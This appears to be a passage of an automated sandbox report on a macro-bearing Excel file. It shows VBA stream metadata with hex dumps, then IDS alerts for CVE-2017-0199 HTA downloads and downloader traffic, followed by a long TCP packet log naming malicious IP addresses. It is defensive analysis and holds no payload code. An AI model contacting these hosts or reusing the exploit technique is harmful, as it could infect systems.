                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . ) . Z . ! " . S . y Q n C e . d H . v W 3 . b . l I . . . . . . . + . . . \\ . p . . . . " [ - R n i i H . . + @ ) Q . $ H ; e ? . . g . c R . . . E . B g . 8 . . + , . 9 . 9 U 5 . z . . . . 9 q . R E | B . . . . a . . . . . . = . . . . ( c = . . . . k E . . m = . . . M . . . . . . . . . . . . . . J . . . . . . . . = . . . . . r | . m @ . . . 5 . . . . . z " . . . . . . . 1 . . . . v . . . { 1 . . . ) l a 1 . B f / s M S ^ . { 6 F . > 0 q 1 . . . . ? . 2
                                                                                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 29 08 c0 5a eb 92 f3 fa fc 11 21 bf 22 b9 9e 19 53 d0 94 79 51 6e 43 65 bc 10 64 48 13 a9 76 86 57 a5 33 03 91 ac 81 62 cb e0 d5 89 6c 86 f3 49 e1 00 02 00 b0 04 c1 00 02 00 2b 98 e2 00 00 00 5c 00 70 00 09 1f c5 ac 22 5b fe 2d 52 92 6e 69 9a 69 93 48 b6 d7 ba b7 16 2b 40 29 83 92 51 06 9a 86
                                                                                  Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 525
                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                  CLSID:
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Stream Size:525
                                                                                  Entropy:5.293222590234424
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:I D = " { E A 5 1 A 5 F 6 - 2 F 6 E - 4 3 5 8 - A 2 6 D - 0 B 3 F 1 8 D B 7 B 1 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 4 6 6 9 1 B F 9 1 A 7 9 5 A 7 9
                                                                                  Data Raw:49 44 3d 22 7b 45 41 35 31 41 35 46 36 2d 32 46 36 45 2d 34 33 35 38 2d 41 32 36 44 2d 30 42 33 46 31 38 44 42 37 42 31 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                  Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:104
                                                                                  Entropy:3.0488640812019017
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                  Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:2644
                                                                                  Entropy:3.9783776774947524
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                  Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                  Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:553
                                                                                  Entropy:6.356033914304728
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                                                                                  Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 8c f8 0a 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-09-30T10:12:20.038629+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164172.245.123.680TCP
                                                                                  2024-09-30T10:12:20.043508+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1172.245.123.680192.168.2.2249164TCP
                                                                                  2024-09-30T10:12:22.720603+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166172.245.123.680TCP
                                                                                  2024-09-30T10:12:22.720605+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1172.245.123.680192.168.2.2249166TCP
                                                                                  2024-09-30T10:12:44.169207+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249172172.245.123.680TCP
                                                                                  2024-09-30T10:12:48.103213+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249173193.122.130.080TCP
                                                                                  2024-09-30T10:12:49.716717+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249173193.122.130.080TCP
                                                                                  2024-09-30T10:12:50.120555+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249175188.114.96.3443TCP
                                                                                  2024-09-30T10:12:51.550829+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249176132.226.8.16980TCP
                                                                                  2024-09-30T10:12:52.906975+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249178132.226.247.7380TCP
                                                                                  2024-09-30T10:12:53.392220+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249179188.114.97.3443TCP
                                                                                  2024-09-30T10:13:00.977373+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249187193.122.6.16880TCP
                                                                                  2024-09-30T10:13:01.037486+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249188188.114.96.3443TCP
                                                                                  2024-09-30T10:13:02.049650+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249187193.122.6.16880TCP
                                                                                  2024-09-30T10:13:02.434337+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249190188.114.96.3443TCP
                                                                                  2024-09-30T10:13:03.528766+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249191193.122.130.080TCP
                                                                                  2024-09-30T10:13:07.171691+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249196188.114.97.3443TCP
                                                                                  2024-09-30T10:13:09.823366+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249200188.114.97.3443TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Sep 30, 2024 10:12:17.336041927 CEST49163443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:17.336090088 CEST44349163172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:17.336209059 CEST49163443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:17.342180014 CEST49163443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:17.342195034 CEST44349163172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:17.827225924 CEST44349163172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:17.827337027 CEST49163443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:17.833539963 CEST49163443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:17.833559036 CEST44349163172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:17.833869934 CEST44349163172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:17.833961010 CEST49163443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:17.908484936 CEST49163443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:17.951446056 CEST44349163172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:19.521725893 CEST44349163172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:19.521805048 CEST44349163172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:19.521826982 CEST49163443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:19.521856070 CEST49163443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:19.523510933 CEST49163443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:19.523530006 CEST44349163172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:19.540009975 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:19.544950008 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:19.545145035 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:19.545196056 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:19.549993038 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.038341045 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.038358927 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.038366079 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.038372993 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.038378954 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.038383961 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.038393974 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.038399935 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.038405895 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.038413048 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.038629055 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.043508053 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.043519020 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.043529987 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.043579102 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.043593884 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.045794010 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.128850937 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.128866911 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.128885031 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.128896952 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.128907919 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.128923893 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.128937006 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.129122019 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.129133940 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.129144907 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.129154921 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.129162073 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.129167080 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.129174948 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.129193068 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.129200935 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.130003929 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.130016088 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.130028009 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.130053043 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.130064011 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.130364895 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.130376101 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.130387068 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.130410910 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.130420923 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.130438089 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.130450010 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.130481005 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.131192923 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.131237984 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.131241083 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.131253004 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.131282091 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.131290913 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.131302118 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.131335974 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.132106066 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.132147074 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.133702040 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.133748055 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.133775949 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.133817911 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219364882 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219393015 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219413996 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219425917 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219429016 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219436884 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219449043 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219449997 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219449997 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219460011 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219470024 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219470978 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219482899 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219484091 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219506025 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219511986 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219517946 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219521999 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219532967 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219543934 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219544888 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219557047 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219568968 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219585896 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220058918 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220069885 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220081091 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220104933 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220105886 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220110893 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220117092 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220128059 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220139980 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220149040 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220161915 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220179081 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220240116 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220249891 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220264912 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220284939 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220299006 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220767021 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220778942 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220788956 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220822096 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220824003 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220835924 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220835924 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220848083 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220863104 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220865011 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220870972 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220881939 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220901966 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220928907 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220940113 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220956087 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220967054 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220972061 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220987082 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.221004009 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.221534967 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.221577883 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.221962929 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.222006083 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.436641932 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.436733961 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.502341986 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.502382994 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.532964945 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:20.532994032 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.533062935 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:20.734067917 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:20.734097004 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:21.211604118 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:21.211664915 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:21.271962881 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:21.271996975 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:21.272322893 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:21.272396088 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:21.366480112 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:21.411401987 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.213360071 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.213438988 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.213536024 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:22.213557005 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:22.214970112 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:22.214984894 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.229070902 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.234270096 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.235204935 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.235387087 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.240098000 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720527887 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720546007 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720561028 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720572948 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720583916 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720593929 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720602989 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.720604897 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720616102 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720628977 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720630884 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.720630884 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.720642090 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720643044 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.720650911 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.720669985 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.720681906 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.725541115 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.725554943 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.725567102 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.725595951 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.725756884 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.727622986 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.810959101 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.810972929 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.810982943 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.810992956 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811002970 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811162949 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.811162949 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.811315060 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811326981 CEST8049166172.245.123.6192.168.2.22
